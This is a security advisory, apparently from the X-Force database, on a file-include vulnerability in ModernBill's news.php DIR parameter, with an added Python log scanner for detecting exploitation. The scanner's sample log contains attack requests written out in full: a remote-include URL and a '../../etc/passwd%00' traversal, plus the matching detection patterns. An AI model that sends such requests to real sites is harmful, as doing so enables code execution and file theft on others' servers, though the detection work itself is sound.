ModernBill news.php script file include

modernbill-news-file-include (20036)

Risk level: Medium

Description:

ModernBill could allow a remote attacker to include malicious PHP files. If the register_globals option is enabled, a remote attacker could send a specially-crafted URL to the news.php script that uses the DIR parameter to specify a malicious file on the local system, which would allow the attacker to view or execute arbitrary code on the vulnerable system.
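As an added example (not part of this advisory or of ModernBill), a log-hunting script for the request shape the description and the CVE entry name: the DIR parameter of news.php carrying a remote URL or a filesystem path instead of a directory name. The access-log lines are constructed (Apache combined format) and the finding labels are assumptions.

```python
"""Flag news.php requests whose DIR parameter carries a URL or a path (added example)."""
import re
from typing import Optional
from urllib.parse import urlsplit, parse_qs, unquote

# Apache combined log prefix: client, ident, user, [timestamp], "METHOD target PROTO", status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def classify_dir(value: str) -> Optional[str]:
    """Return a finding label for a DIR value, or None if it looks like a plain directory name."""
    v = unquote(value)
    if re.match(r'^[a-z][a-z0-9+.-]*://', v, re.I):
        return 'remote-include'        # CVE-2005-1054 shape: DIR references a remote web server
    if '..' in v.replace('\\', '/').split('/'):
        return 'path-traversal'        # climbing out of the expected directory
    if '\x00' in v:
        return 'null-byte-truncation'  # cuts off whatever the script appends to the path
    if v.startswith('/') or re.match(r'^[A-Za-z]:[\\/]', v):
        return 'absolute-path'         # local-file include as in the Description above
    return None

def scan_log(lines):
    """Yield (client, timestamp, label, decoded DIR value) for each suspicious news.php request."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m['target'])
        if not parts.path.lower().endswith('/news.php'):
            continue  # the advisory concerns news.php only; other scripts are left alone here
        # register_globals turns every query key into a variable; the advisory names DIR.
        for value in parse_qs(parts.query, keep_blank_values=True).get('DIR', []):
            label = classify_dir(value)
            if label:
                yield (m['client'], m['ts'], label, unquote(value))

SAMPLE_LOG = [  # constructed lines; addresses are from documentation ranges
    '203.0.113.5 - - [11/Apr/2005:10:01:02 +0000] "GET /news.php?id=3 HTTP/1.1" 200 512 "-" "Mozilla"',
    '203.0.113.7 - - [11/Apr/2005:10:01:09 +0000] "GET /news.php?DIR=http://198.51.100.9/x.txt? HTTP/1.1" 200 48 "-" "curl"',
    '203.0.113.8 - - [11/Apr/2005:10:02:30 +0000] "GET /news.php?DIR=../../../../etc/passwd%00 HTTP/1.1" 200 1200 "-" "Mozilla"',
    '203.0.113.9 - - [11/Apr/2005:10:03:00 +0000] "GET /orderwiz.php?DIR=http://192.0.2.1/ HTTP/1.1" 200 90 "-" "Mozilla"',
]

if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
```

Run against real logs by replacing SAMPLE_LOG with the file's lines; a legitimate deployment should produce no hits, since DIR is meant to name a directory, not a path or URL.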


Consequences:

Gain Access

Remedy:

Upgrade to the latest version of ModernBill (4.3.1 or later), when it becomes available from the ModernBill Web site. See References.

References:

  • GulfTech Research and Development, April 10th, 2005: Multiple ModernBill 4.3.0 And Earlier Vulnerabilities.
  • ModernBill Web site: Web Host Billing Software.
  • BID-13086: ModernGigabyte ModernBill News.PHP File Include Vulnerability
  • CVE-2005-1054: PHP remote file inclusion vulnerability in news.php in ModernBill 4.3.0 and earlier allows remote attackers to execute arbitrary PHP code by modifying the DIR parameter to reference a URL on a remote web server that contains the code.
  • OSVDB ID: 15427: ModernBill news.php Remote File Inclusion
  • SA14890: ModernBill Cross-Site Scripting and File Inclusion Vulnerabilities
  • SECTRACK ID: 1013672: ModernBill Include File Error in Sample `news.php` Script Lets Remote Users Execute Commands and Input Validation Holes in `orderwiz.php` Permit Cross-Site Scripting Attacks

Platforms Affected:

  • ModernBill ModernBill 4.3.0 and prior

Reported:

Apr 11, 2005

The information within this database may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (IBM Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

For corrections or additions please email xforce@iss.net
